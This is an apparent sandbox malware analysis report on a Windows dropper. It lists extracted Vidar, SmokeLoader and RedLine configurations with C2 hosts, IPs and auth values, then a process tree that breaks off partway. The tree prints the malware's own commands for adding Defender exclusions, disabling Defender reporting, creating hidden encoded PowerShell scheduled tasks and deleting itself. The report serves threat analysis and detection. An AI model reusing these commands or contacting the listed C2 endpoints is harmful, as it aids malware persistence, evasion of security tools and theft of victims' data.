Analysis

  • max time kernel
    118s
  • max time network
    170s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    15-03-2022 11:37

General

  • Target

    ff13ad3377314c71fd16ed2328643957e3ae8f3b513ea2db461705b9e2032c69.exe

  • Size

    3.4MB

  • MD5

    34a18f5dc39e9dfdea06f4af9f446642

  • SHA1

    3c2fc367c4995f64fdde168c22216cd01baedd5f

  • SHA256

    ff13ad3377314c71fd16ed2328643957e3ae8f3b513ea2db461705b9e2032c69

  • SHA512

    afdc07b7ad1062f647377272457c7678e91db9075bf7e4adda0c4080f43d8b6bc8b189c57ab9ebc5b4c356a6319091430b8b7b5949d02adc0ee4948899eb3b7d

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

da da

C2

86.107.197.196:63065

Attributes
  • auth_value

    9b1654b30797c210c85bd0890936a5b9

Extracted

Family

vidar

Version

50.9

Botnet

1177

C2

https://ieji.de/@sam7al

https://busshi.moe/@sam0al

Attributes
  • profile_id

    1177

Extracted

Family

redline

Botnet

ruzki14_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    13b742acfe493b01c5301781c98d3fbe

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

filinnn1

C2

5.45.77.29:2495

Attributes
  • auth_value

    da347df57c88b125ede510dbe7fcc0f4

Extracted

Family

redline

Botnet

Ani

C2

detuyaluro.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 48 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 7 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 5 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff13ad3377314c71fd16ed2328643957e3ae8f3b513ea2db461705b9e2032c69.exe
    "C:\Users\Admin\AppData\Local\Temp\ff13ad3377314c71fd16ed2328643957e3ae8f3b513ea2db461705b9e2032c69.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3524
      • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_10.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_10.exe
            sonia_10.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:8
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2092
          • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_9.exe
            sonia_9.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:3000
            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_9.exe
              C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_9.exe
              6⤵
              • Executes dropped EXE
              PID:4936
            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_9.exe
              C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_9.exe
              6⤵
              • Executes dropped EXE
              PID:4604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1388
          • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_8.exe
            sonia_8.exe
            5⤵
            • Executes dropped EXE
            PID:2444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4308
          • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_7.exe
            sonia_7.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:2472
            • C:\Users\Admin\Documents\8S6SEqp0C9r04HgrWSxaHdKl.exe
              "C:\Users\Admin\Documents\8S6SEqp0C9r04HgrWSxaHdKl.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Checks processor information in registry
              PID:224
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im 8S6SEqp0C9r04HgrWSxaHdKl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\8S6SEqp0C9r04HgrWSxaHdKl.exe" & del C:\ProgramData\*.dll & exit
                7⤵
                  PID:2792
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im 8S6SEqp0C9r04HgrWSxaHdKl.exe /f
                    8⤵
                    • Kills process with taskkill
                    PID:1260
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1376
              • C:\Users\Admin\Documents\ZchUXakA7zQs1UbptiVU79ID.exe
                "C:\Users\Admin\Documents\ZchUXakA7zQs1UbptiVU79ID.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                PID:4048
                • C:\Users\Admin\AppData\Local\Temp\0bf1dc29-856b-4082-b552-adfc22f0a91c.exe
                  "C:\Users\Admin\AppData\Local\Temp\0bf1dc29-856b-4082-b552-adfc22f0a91c.exe"
                  7⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:1536
              • C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe
                "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Windows security modification
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                • Drops file in Windows directory
                • System policy modification
                PID:1356
                • C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\AdvancedRun.exe
                  "C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  PID:1404
                  • C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\AdvancedRun.exe
                    "C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\AdvancedRun.exe" /SpecialRun 4101d8 1404
                    8⤵
                    • Executes dropped EXE
                    PID:1872
                • C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\4509b486-afc5-40a2-9650-d49305742708.exe
                  "C:\Users\Admin\AppData\Local\Temp\2a664afd-9f68-452b-b039-ba449e6367f6\4509b486-afc5-40a2-9650-d49305742708.exe" /o /c "Windows-Defender" /r
                  7⤵
                  • Executes dropped EXE
                  PID:3508
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe" -Force
                  7⤵
                    PID:1004
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      8⤵
                        PID:2316
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
                      7⤵
                        PID:4420
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe" -Force
                        7⤵
                          PID:2412
                        • C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe
                          "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4292
                        • C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe
                          "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4304
                        • C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe
                          "C:\Users\Admin\Documents\XdonnVtCDLKCJINoe1yjPJ_y.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:3396
                      • C:\Users\Admin\Documents\Bdvc7UYV6muzRKlIumLLzrZp.exe
                        "C:\Users\Admin\Documents\Bdvc7UYV6muzRKlIumLLzrZp.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3036
                      • C:\Users\Admin\Documents\Byoci7hPW_hHuy3ewNZ_TxR9.exe
                        "C:\Users\Admin\Documents\Byoci7hPW_hHuy3ewNZ_TxR9.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:4488
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 444
                          7⤵
                          • Program crash
                          PID:4604
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 452
                          7⤵
                          • Program crash
                          PID:4872
                      • C:\Users\Admin\Documents\Rg2o0iW8yGLqaViJhkdUVtWR.exe
                        "C:\Users\Admin\Documents\Rg2o0iW8yGLqaViJhkdUVtWR.exe"
                        6⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:2148
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 800
                          7⤵
                          • Program crash
                          PID:1536
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 824
                          7⤵
                          • Program crash
                          PID:484
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1264
                          7⤵
                          • Program crash
                          PID:3888
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1272
                          7⤵
                          • Program crash
                          PID:3952
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1316
                          7⤵
                          • Program crash
                          PID:5060
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1256
                          7⤵
                          • Program crash
                          PID:1848
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Rg2o0iW8yGLqaViJhkdUVtWR.exe" /f & erase "C:\Users\Admin\Documents\Rg2o0iW8yGLqaViJhkdUVtWR.exe" & exit
                          7⤵
                            PID:392
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im "Rg2o0iW8yGLqaViJhkdUVtWR.exe" /f
                              8⤵
                              • Kills process with taskkill
                              PID:1004
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1144
                            7⤵
                            • Program crash
                            PID:1692
                        • C:\Users\Admin\Documents\HfZ0d3Nym5303FQK5oMQwlcp.exe
                          "C:\Users\Admin\Documents\HfZ0d3Nym5303FQK5oMQwlcp.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:1632
                        • C:\Users\Admin\Documents\zozMzLh4Rl6xWzHF8AWjKL3u.exe
                          "C:\Users\Admin\Documents\zozMzLh4Rl6xWzHF8AWjKL3u.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:636
                        • C:\Users\Admin\Documents\oLNPkOWUuqcHfMANGQC_miwX.exe
                          "C:\Users\Admin\Documents\oLNPkOWUuqcHfMANGQC_miwX.exe"
                          6⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Checks processor information in registry
                          PID:3172
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im oLNPkOWUuqcHfMANGQC_miwX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\oLNPkOWUuqcHfMANGQC_miwX.exe" & del C:\ProgramData\*.dll & exit
                            7⤵
                              PID:2608
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im oLNPkOWUuqcHfMANGQC_miwX.exe /f
                                8⤵
                                • Kills process with taskkill
                                PID:5060
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 6
                                8⤵
                                • Delays execution with timeout.exe
                                PID:3960
                          • C:\Users\Admin\Documents\0uiEW6ZF5BLFEfNleYluBSkX.exe
                            "C:\Users\Admin\Documents\0uiEW6ZF5BLFEfNleYluBSkX.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:1456
                            • C:\Windows\SysWOW64\svchost.exe
                              "C:\Windows\System32\svchost.exe"
                              7⤵
                                PID:1872
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                7⤵
                                  PID:1312
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd
                                    8⤵
                                      PID:4120
                                      • C:\Windows\SysWOW64\tasklist.exe
                                        tasklist /FI "imagename eq BullGuardCore.exe"
                                        9⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1636
                                      • C:\Windows\SysWOW64\find.exe
                                        find /I /N "bullguardcore.exe"
                                        9⤵
                                          PID:4228
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist /FI "imagename eq PSUAService.exe"
                                          9⤵
                                          • Enumerates processes with tasklist
                                          PID:3488
                                        • C:\Windows\SysWOW64\find.exe
                                          find /I /N "psuaservice.exe"
                                          9⤵
                                            PID:2488
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                            9⤵
                                              PID:484
                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                              Sta.exe.pif V
                                              9⤵
                                              • Executes dropped EXE
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:812
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                10⤵
                                                  PID:1644
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 456
                                                    11⤵
                                                    • Program crash
                                                    PID:4488
                                        • C:\Users\Admin\Documents\Gf5qR0bJDJB4tiAoGOULxWjW.exe
                                          "C:\Users\Admin\Documents\Gf5qR0bJDJB4tiAoGOULxWjW.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of SetThreadContext
                                          PID:4220
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            7⤵
                                              PID:3524
                                          • C:\Users\Admin\Documents\d9YofFxLUMnFRDwghrQo46H3.exe
                                            "C:\Users\Admin\Documents\d9YofFxLUMnFRDwghrQo46H3.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3532
                                            • C:\Users\Admin\Documents\d9YofFxLUMnFRDwghrQo46H3.exe
                                              "C:\Users\Admin\Documents\d9YofFxLUMnFRDwghrQo46H3.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:544
                                          • C:\Users\Admin\Documents\PhBHa0pcw6rdetIINdEf0_AG.exe
                                            "C:\Users\Admin\Documents\PhBHa0pcw6rdetIINdEf0_AG.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of SetThreadContext
                                            PID:4696
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                              7⤵
                                                PID:4624
                                            • C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe
                                              "C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3424
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c timeout 45
                                                7⤵
                                                  PID:1736
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout 45
                                                    8⤵
                                                    • Delays execution with timeout.exe
                                                    PID:1180
                                                • C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe"
                                                  7⤵
                                                    PID:3352
                                                  • C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe
                                                    C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe
                                                    7⤵
                                                      PID:2628
                                                    • C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe
                                                      C:\Users\Admin\Documents\FYHyeEvMgIvnoChQtSIqHlDj.exe
                                                      7⤵
                                                        PID:3952
                                                    • C:\Users\Admin\Documents\vVqW0bWz6HMGrdPNiuUKwdnp.exe
                                                      "C:\Users\Admin\Documents\vVqW0bWz6HMGrdPNiuUKwdnp.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4552
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 464
                                                        7⤵
                                                        • Program crash
                                                        PID:476
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 472
                                                        7⤵
                                                        • Program crash
                                                        PID:2576
                                                    • C:\Users\Admin\Documents\ZTC4qzST4EBrPg88LF6uTDmv.exe
                                                      "C:\Users\Admin\Documents\ZTC4qzST4EBrPg88LF6uTDmv.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4740
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\ZTC4qzST4EBrPg88LF6uTDmv.exe
                                                        7⤵
                                                          PID:3768
                                                          • C:\Windows\system32\choice.exe
                                                            choice /C Y /N /D Y /T 0
                                                            8⤵
                                                              PID:2752
                                                        • C:\Users\Admin\Documents\63VnWUK6R4zmMI1SwoFjvGvH.exe
                                                          "C:\Users\Admin\Documents\63VnWUK6R4zmMI1SwoFjvGvH.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:2544
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 472
                                                            7⤵
                                                            • Program crash
                                                            PID:3836
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 492
                                                            7⤵
                                                            • Program crash
                                                            PID:1080
                                                        • C:\Users\Admin\Documents\DeDm2UMBWBc5UYk1KmLHZl5j.exe
                                                          "C:\Users\Admin\Documents\DeDm2UMBWBc5UYk1KmLHZl5j.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:2956
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS480E.tmp\Install.exe
                                                            .\Install.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4504
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS5D6A.tmp\Install.exe
                                                              .\Install.exe /S /site_id "525403"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks computer location settings
                                                              • Drops file in System32 directory
                                                              • Enumerates system info in registry
                                                              PID:3344
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                9⤵
                                                                  PID:4824
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                    10⤵
                                                                      PID:3508
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                        11⤵
                                                                          PID:4176
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                          11⤵
                                                                            PID:4652
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                        9⤵
                                                                          PID:4696
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                            10⤵
                                                                              PID:1180
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                11⤵
                                                                                  PID:2316
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                  11⤵
                                                                                    PID:4060
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "gYQTRyObP" /SC once /ST 12:40:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                9⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3888
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "gYQTRyObP"
                                                                                9⤵
                                                                                  PID:4696
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /DELETE /F /TN "gYQTRyObP"
                                                                                  9⤵
                                                                                    PID:3744
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 13:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\DmuwztT.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                    9⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4316
                                                                            • C:\Users\Admin\Documents\d7vAoooQCEdjlwHXaQO5rxvr.exe
                                                                              "C:\Users\Admin\Documents\d7vAoooQCEdjlwHXaQO5rxvr.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4708
                                                                            • C:\Users\Admin\Documents\q1NVvUbNZVGKXKQQ6uK_Fo1Y.exe
                                                                              "C:\Users\Admin\Documents\q1NVvUbNZVGKXKQQ6uK_Fo1Y.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5112
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                7⤵
                                                                                  PID:3676
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1352
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_6.exe
                                                                              sonia_6.exe
